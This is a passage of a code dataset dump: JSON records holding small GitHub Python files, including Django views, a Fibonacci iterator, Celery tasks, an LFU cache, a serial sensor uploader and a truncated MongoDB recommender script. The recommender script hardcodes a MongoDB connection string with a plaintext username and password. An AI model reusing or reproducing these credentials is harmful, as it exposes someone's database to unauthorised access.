"numpy.multiply", "line_number": 261, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 262, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 278, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 280, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 281, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 282, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 284, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 285, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 287, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 288, "usage_type": "call"}, {"api_name": "math.acos", "line_number": 290, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 290, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 291, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 291, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 296, "usage_type": "call"}, {"api_name": "numpy.multiply", "line_number": 296, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 297, "usage_type": "attribute"}, {"api_name": "cv2.LINE_AA", "line_number": 297, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 312, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 313, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 314, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 316, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 317, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 319, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 320, "usage_type": "call"}, {"api_name": "math.acos", "line_number": 322, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 322, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 323, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 323, "usage_type": "attribute"}, {"api_name": "torch.hub.load", "line_number": 347, "usage_type": "call"}, {"api_name": "torch.hub", "line_number": 347, "usage_type": "attribute"}, {"api_name": "cv2.VideoCapture", "line_number": 362, "usage_type": "call"}, {"api_name": "cv2.namedWindow", "line_number": 364, "usage_type": "call"}, {"api_name": "cv2.WINDOW_NORMAL", "line_number": 364, "usage_type": "attribute"}, {"api_name": "cv2.resizeWindow", "line_number": 365, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 367, "usage_type": "call"}, {"api_name": "cv2.IMREAD_COLOR", "line_number": 367, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 368, "usage_type": "call"}, {"api_name": "cv2.IMREAD_COLOR", "line_number": 368, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 369, "usage_type": "call"}, {"api_name": "cv2.IMREAD_COLOR", "line_number": 369, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 370, "usage_type": "call"}, {"api_name": "cv2.IMREAD_COLOR", "line_number": 370, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 371, "usage_type": "call"}, {"api_name": "cv2.IMREAD_COLOR", "line_number": 371, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 372, "usage_type": "call"}, {"api_name": "cv2.IMREAD_COLOR", "line_number": 372, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 382, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 382, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 383, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 383, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 384, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 384, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 385, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 385, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 386, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 386, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 387, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 387, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 389, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 389, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 390, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 390, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 391, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 391, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 392, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 392, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 393, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 393, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 394, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 394, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 398, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 399, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 400, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 401, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 402, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 403, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 404, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 405, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 406, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 407, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 409, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 409, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 410, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 410, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 411, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 411, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 412, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 412, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 413, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 413, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 414, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 414, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 415, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 415, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 416, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 416, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 417, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 417, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 418, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 418, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 420, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 420, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 421, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 421, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 422, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 422, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 423, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 423, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 424, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 424, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 425, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 425, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 426, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 426, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 427, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 427, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 428, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 428, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 429, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 429, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 471, "usage_type": "call"}, {"api_name": "time.time", "line_number": 472, "usage_type": "call"}, {"api_name": "time.time", "line_number": 499, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 515, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 515, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 523, "usage_type": "call"}, {"api_name": "cv2.COLOR_RGB2BGR", "line_number": 523, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 570, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 584, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 587, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 588, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 589, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 590, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 591, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 605, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 656, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 661, "usage_type": "attribute"}, {"api_name": "torch_geometric.data.Data", "line_number": 664, "usage_type": "call"}, {"api_name": "torch.max", "line_number": 667, "usage_type": "call"}, {"api_name": "torch.exp", "line_number": 667, "usage_type": "call"}, {"api_name": "torch.nn.functional.softmax", "line_number": 671, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 671, "usage_type": "attribute"}, {"api_name": "torch.max", "line_number": 672, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 675, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 675, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 679, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 679, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 683, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 683, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 687, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 687, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 691, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 691, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 695, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 695, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 701, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 701, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 705, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 705, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 720, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 722, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 722, "usage_type": "attribute"}, {"api_name": "torch.max", "line_number": 726, "usage_type": "call"}, {"api_name": "cv2.GaussianBlur", "line_number": 755, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 756, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 756, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 757, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 757, "usage_type": "attribute"}, {"api_name": "math.sqrt", "line_number": 796, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 803, "usage_type": "call"}, {"api_name": "cv2.INTER_AREA", "line_number": 803, "usage_type": "attribute"}, {"api_name": "cv2.rectangle", "line_number": 828, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 834, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 842, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 842, "usage_type": "attribute"}, {"api_name": "numpy.where", "line_number": 849, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 852, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 855, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 858, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 861, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 864, "usage_type": "call"}, {"api_name": "cv2.line", "line_number": 887, "usage_type": "call"}, {"api_name": "cv2.line", "line_number": 888, "usage_type": "call"}, {"api_name": "cv2.line", "line_number": 889, "usage_type": "call"}, {"api_name": "cv2.line", "line_number": 890, "usage_type": "call"}, {"api_name": "cv2.line", "line_number": 891, "usage_type": "call"}, {"api_name": "cv2.line", "line_number": 892, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 917, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 918, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 919, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 920, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 921, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 922, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 946, "usage_type": "call"}, {"api_name": "time.time", "line_number": 951, "usage_type": "call"}, {"api_name": "time.time", "line_number": 959, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 964, "usage_type": "call"}, {"api_name": "time.time", "line_number": 969, "usage_type": "call"}, {"api_name": "time.time", "line_number": 977, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 982, "usage_type": "call"}, {"api_name": "time.time", "line_number": 987, "usage_type": "call"}, {"api_name": "time.time", "line_number": 995, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 1000, "usage_type": "call"}, {"api_name": "time.time", "line_number": 1005, "usage_type": "call"}, {"api_name": "time.time", "line_number": 1013, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 1018, "usage_type": "call"}, {"api_name": "time.time", "line_number": 1023, "usage_type": "call"}, {"api_name": "time.time", "line_number": 1031, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 1036, "usage_type": "call"}, {"api_name": "time.time", "line_number": 1041, "usage_type": "call"}, {"api_name": "time.time", "line_number": 1049, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 1054, "usage_type": "call"}, {"api_name": "time.time", "line_number": 1059, "usage_type": "call"}, {"api_name": "time.time", "line_number": 1067, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 1072, "usage_type": "call"}, {"api_name": "time.time", "line_number": 1077, "usage_type": "call"}, {"api_name": "time.time", "line_number": 1085, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 1139, "usage_type": "call"}, {"api_name": "time.time", "line_number": 1141, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 1169, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 1178, "usage_type": "call"}]}
+{"seq_id": "23596415074", "text": "import os\nfrom copy import deepcopy\n\nfrom django.views.generic import TemplateView, View\nfrom django.conf import settings\nfrom django.urls import reverse_lazy\nfrom django.shortcuts import render\n\nfrom .cv import CV\n\n\ndef static_url(relative_path: str) -> str:\n return os.path.join(settings.STATIC_URL, relative_path)\n\n\nclass NavView(View):\n\n NAV_DEFAULT = {\n 'home': {\n 'label': 'Home',\n 'active': False,\n 'url': reverse_lazy('home')\n },\n 'blog': {\n 'label': 'The Blog',\n 'active': False,\n 'url': reverse_lazy('blog:entry_list')\n }\n }\n\n def __init__(self, *args, **kwargs):\n self.nav = deepcopy(self.NAV_DEFAULT)\n super(NavView, self).__init__(*args, **kwargs)\n\n\nclass HomepageView(NavView):\n\n template = 'pages/home.html'\n\n def get(self, request):\n\n context = {\n 'nav': self.nav\n }\n context.update(CV)\n context['nav']['home']['active'] = True\n\n return render(request, self.template, context=context)\n\n\n\n\n", "repo_name": "the16thpythonist/electronicheart", "sub_path": "electronicheart/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1077, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.join", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "django.conf.settings.STATIC_URL", "line_number": 13, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 13, "usage_type": "name"}, {"api_name": "django.views.generic.View", "line_number": 16, "usage_type": "name"}, {"api_name": "django.urls.reverse_lazy", "line_number": 22, "usage_type": "call"}, {"api_name": "django.urls.reverse_lazy", "line_number": 27, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 32, "usage_type": "call"}, {"api_name": "cv.CV", "line_number": 45, "usage_type": "argument"}, {"api_name": "django.shortcuts.render", "line_number": 48, "usage_type": "call"}]}
+{"seq_id": "36362980224", "text": "\"\"\"\nIterador para la serie de Fibonacci.\n\nCreamos el iterador como una clase derivada de collections.abc.Iterator.\n\nAutor: Rafael del Castillo Gomariz\n\"\"\"\nfrom typeguard import typechecked\nfrom collections.abc import Iterator\n\n\n@typechecked\nclass FibonacciIterator(Iterator):\n\n def __init__(self, stop: int = 10):\n if stop < 1:\n raise ValueError(\"El máximo de elementos de la serie no puede ser negativo\")\n self.__index = 0\n self.__current = 0\n self.__next = 1\n self.__stop = stop\n\n def __next__(self):\n if self.__index == self.__stop:\n raise StopIteration\n self.__index += 1\n fib_num = self.__current\n self.__current, self.__next = self.__next, self.__current + self.__next\n return fib_num\n\nif __name__ == '__main__':\n print(\"Serie de Fibonacci\")\n print(\"------------------\")\n\n n = int(input(\"¿Cuántos números quiere mostrar? \"))\n for i, fib_n in enumerate(FibonacciIterator(n)):\n print(f\"{i+1}: {fib_n}\")\n", "repo_name": "rdelcastillo/DAW-Python", "sub_path": "ejemplosclase/7iteradores/iterador_fibonacci.py", "file_name": "iterador_fibonacci.py", "file_ext": "py", "file_size_in_byte": 1028, "program_lang": "python", "lang": "es", "doc_type": "code", "stars": 10, "dataset": "github-code", "pt": "53", "api": [{"api_name": "collections.abc.Iterator", "line_number": 13, "usage_type": "name"}, {"api_name": "typeguard.typechecked", "line_number": 12, "usage_type": "name"}]}
+{"seq_id": "30727276831", "text": "import os\nimport time\nfrom celery import Celery\n\nCELERY_BROKER_URL = os.environ.get('CELERY_BROKER_URL', 'redis://localhost:6379'),\nCELERY_RESULT_BACKEND = os.environ.get('CELERY_RESULT_BACKEND', 'redis://localhost:6379')\n\ncelery = Celery('tasks', broker=CELERY_BROKER_URL, backend=CELERY_RESULT_BACKEND)\n\n@celery.task(name='tasks.find_solution')\ndef find_solution(ncs: str, sequence: str, stocks: str) -> str:\n time.sleep(5)\n return 'ncs: {}\\nsequence: {}\\nstock: {}'.format(ncs, sequence, stocks)", "repo_name": "micolaprs/comblabel", "sub_path": "src/queue/tasks.py", "file_name": "tasks.py", "file_ext": "py", "file_size_in_byte": 504, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.environ.get", "line_number": 5, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 5, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 6, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 6, "usage_type": "attribute"}, {"api_name": "celery.Celery", "line_number": 8, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 12, "usage_type": "call"}, {"api_name": "celery.task", "line_number": 10, "usage_type": "call"}]}
+{"seq_id": "23882870380", "text": "from collections import defaultdict, OrderedDict\n\nclass LFUCache:\n\n# Approach: Use ordereddict and normal dict, keep updating stack as and when a key is accessed\n# TC: O(1) for get and put functions as we use ordereddict which works like a DLL\n# SC: O(1) + O(1) as capacity of the 2 dicts is constant\n\n def __init__(self, capacity: int):\n self.value_map = {} # To store all keys and their frequencies (key:freq)\n self.freq_map = {} # To store all keys and value in cache in order (freq: {key: val})\n self.capacity = capacity\n self.lowest_frequency = 1\n\n def update_key(self,key: int, value: int = None): \n freq = self.value_map[key]\n if not value:\n # Get operation being performed so retain val\n val = self.freq_map[freq][key]\n else:\n # Put operation for exisiting key, so update val\n val = value\n # 1. Remove entry from freqmap\n del self.freq_map[freq][key] \n # 2. Append to front of freqmap\n if freq+1 in self.freq_map:\n self.freq_map[freq+1][key] = val \n else:\n self.freq_map[freq+1]= defaultdict(OrderedDict)\n self.freq_map[freq+1][key] = val \n # 3. Update freq in valuemap\n self.value_map[key] = freq+1\n \n if self.lowest_frequency == freq and not self.freq_map[freq]: # Update lowest freq\n self.lowest_frequency += 1\n \n return val\n\n def get(self, key: int) -> int:\n if key in self.value_map:\n # If key exists, return and update freq_map and value_map\n return self.update_key(key)\n return -1\n\n def put(self, key: int, value: int) -> None:\n if not key in self.value_map:\n # Adding new entry so check cache capacity \n if not self.capacity:\n # Evict key and value\n if self.lowest_frequency in self.freq_map:\n # 1. Get 1 st key in ordered dict\n first_key = next(iter(self.freq_map[self.lowest_frequency]))\n if len(self.freq_map[self.lowest_frequency]) > 1: \n # 2. If more than one entry for lowest freq, need to evict as per lru\n del self.freq_map[self.lowest_frequency][first_key]\n del self.value_map[first_key]\n else:\n # 3. Only one entry for lowest frew so evict directly\n del self.freq_map[self.lowest_frequency]\n del self.value_map[first_key]\n self.capacity += 1\n if self.capacity:\n # To ensure there is any capacity to begin with \n if 1 not in self.freq_map: # Adding element for first time so freq is 1\n self.freq_map[1] = defaultdict(OrderedDict)\n self.freq_map[1][key] = value # Add key in freqmap\n self.value_map[key] = 1 # Add key in valuemap\n self.lowest_frequency = min(1, self.lowest_frequency) # Update lowest freq\n self.capacity -= 1 # Update capacity\n else:\n # Updating existing entry \n self.update_key(key,value)\n\n# Your LFUCache object will be instantiated and called as such:\n# obj = LFUCache(capacity)\n# param_1 = obj.get(key)\n# obj.put(key,value)", "repo_name": "sanafathima418/StriverSDESheet", "sub_path": "Stack/lfu_cache.py", "file_name": "lfu_cache.py", "file_ext": "py", "file_size_in_byte": 3385, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "collections.defaultdict", "line_number": 29, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 29, "usage_type": "argument"}, {"api_name": "collections.defaultdict", "line_number": 65, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 65, "usage_type": "argument"}]}
+{"seq_id": "41575861174", "text": "import serial \nimport threading\nimport requests\nimport time\nimport random\nimport os\nclass DeviceHandler:\n \n def __init__(self,device_id,location,baud_rate = 9600,serial_port = '/dev/ttyUSB0',server_address = 'http://127.0.0.1:3000/post-data'):\n self.baud_rate = baud_rate\n self.serial_port = serial_port\n self.server_address = server_address \n self.DeviceID = device_id\n self.Location = location\n\n try:\n self.uc = serial.Serial(self.serial_port,self.baud_rate)\n\n except:\n print(\"\\nPermission issues detected while accessing the port.\\n\\tTry running - 'sudo chmod a+rw /dev/ttyUSB0'\\n\")\n exit()\n\n def run(self):\n try:\n FetchedData = self.uc.readline()\n FetchedData = FetchedData.decode(\"utf-8\") \n\n var1,var2,var3,var4 = FetchedData.split('-')\n except:\n print('\\nHaving issues with decoding...')\n return\n\n\n data ={\n 'CO2':var1.strip(),\n 'CO':var2.strip(),\n 'CH4':var3.strip(),\n 'AIRQ':var4.strip(),\n 'DeviceID': self.DeviceID,\n 'location': self.Location\n }\n try:\n r = requests.post(self.server_address,data)\n except:\n os.system('clear')\n print('\\n\\tServer not responding...Make sure its up and running\\n\\t\\tReconnecting in 10 secs..')\n time.sleep(10)\n return\n print('\\n\\tValue Sent -> ' + str(data['CO2'])+\" \"+str(data['CO'])+\" \"+str(data['CH4'])) \n\n\n\nif __name__ == \"__main__\":\n \n handler = DeviceHandler(device_id = 'JAGAT2019',location = 'Jagatpura')\n \n while True:\n handler.run()\n time.sleep(10)\n", "repo_name": "mayankt28/YU", "sub_path": "RPi-Code/handler.py", "file_name": "handler.py", "file_ext": "py", "file_size_in_byte": 1748, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "serial.Serial", "line_number": 17, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 43, "usage_type": "call"}, {"api_name": "os.system", "line_number": 45, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 47, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 59, "usage_type": "call"}]}
+{"seq_id": "15201616342", "text": "#!/usr/bin/env python\n#\n# This file is part of cpu_cores released under the MIT license.\n# See the LICENSE file for more information.\n\nfrom setuptools import setup, find_packages\nimport cpu_cores\n\nDESCRIPTION = \"cpu_cores-py is a small python library to get the number of\" +\\\n \"'real physical' cpu cores of a linux/osx box\"\ntry:\n with open('PIP.rst') as f:\n LONG_DESCRIPTION = f.read()\nexcept IOError:\n LONG_DESCRIPTION = DESCRIPTION\n\nwith open('pip-requirements.txt') as reqs:\n install_requires = [\n line for line in reqs.read().split('\\n') if (line and not\n line.startswith('--'))]\n\nsetup(\n name='cpu_cores',\n version=cpu_cores.__version__,\n author=\"Fabien MARTY\",\n author_email=\"fabien.marty@gmail.com\",\n url=\"https://github.com/thefab/cpu_cores\",\n packages=find_packages(),\n license='MIT',\n download_url='https://github.com/thefab/cpu_cores',\n description=DESCRIPTION,\n long_description=LONG_DESCRIPTION,\n scripts=[\"scripts/get_cpu_physical_cores.py\"],\n install_requires=install_requires,\n classifiers=[\n 'Development Status :: 3 - Alpha',\n 'Environment :: Console',\n 'Intended Audience :: Developers',\n 'Intended Audience :: System Administrators',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: MacOS :: MacOS X',\n 'Operating System :: POSIX :: Linux',\n 'Programming Language :: Python :: 2.6',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3.2',\n 'Programming Language :: Python :: 3.3',\n 'Topic :: Utilities',\n 'Topic :: System :: Hardware',\n 'Topic :: Software Development :: Libraries',\n 'Topic :: Software Development',\n ]\n)\n", "repo_name": "thefab/cpu_cores", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 1821, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "setuptools.setup", "line_number": 22, "usage_type": "call"}, {"api_name": "cpu_cores.__version__", "line_number": 24, "usage_type": "attribute"}, {"api_name": "setuptools.find_packages", "line_number": 28, "usage_type": "call"}]}
+{"seq_id": "32379609335", "text": "from django.urls import path\n\nfrom . import views\n\napp_name = 'dns_records'\nurlpatterns = [\n path('', views.DnsRecordListView.as_view(), name='list'),\n path('export/', views.ZoneExportView.as_view(), name='zone_export'),\n path('import/', views.ZoneImportView.as_view(), name='zone_import'),\n path('create/', views.DnsRecordCreateView.as_view(), name='create'),\n path('/', views.DnsRecordDetailView.as_view(), name='detail'),\n path('/update/', views.DnsRecordUpdateView.as_view(), name='update'),\n path('/delete/', views.DnsRecordDeleteView.as_view(), name='delete'),\n]\n", "repo_name": "sjy5386/flare-core", "sub_path": "records/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 614, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 12, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 13, "usage_type": "call"}]}
+{"seq_id": "18224127194", "text": "# author: @iamtienng\n# import tools for saving model in database\nimport pickle\n\n# import tools for machine learning model\nimport pandas as pd\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\n\n# import machine learning model\nfrom recommendation_system.matrix_factorization import MatrixFactorization\n\n# import tools for database\nfrom pymongo import MongoClient\nimport bson\n\n# connect to the database\n# usernameDB = \"iamtienng\"\n# passwordDB = \"d4O8CmCGCeCI8vzA\"\nclient = MongoClient(\n 'mongodb+srv://iamtienng:d4O8CmCGCeCI8vzA@mrsbbdb.wqcrinp.mongodb.net/?retryWrites=true&w=majority')\n# localhost\n# client = MongoClient(\"localhost\", 27017)\ndb = client[\"MRSBBDB\"]\n# YOU MUST import ratings through MongoDBCompass\n# YOU MUST import movies through MongoDBCompass\n\n# load models for mfcf model if the model does not exist in the database\nW = np.asarray([])\nX = np.asarray([])\nd = np.asarray([])\nb = np.asarray([])\nif len(list(db[\"model\"].find())) == 0:\n W = np.loadtxt('./data/W.csv', delimiter=',')\n X = 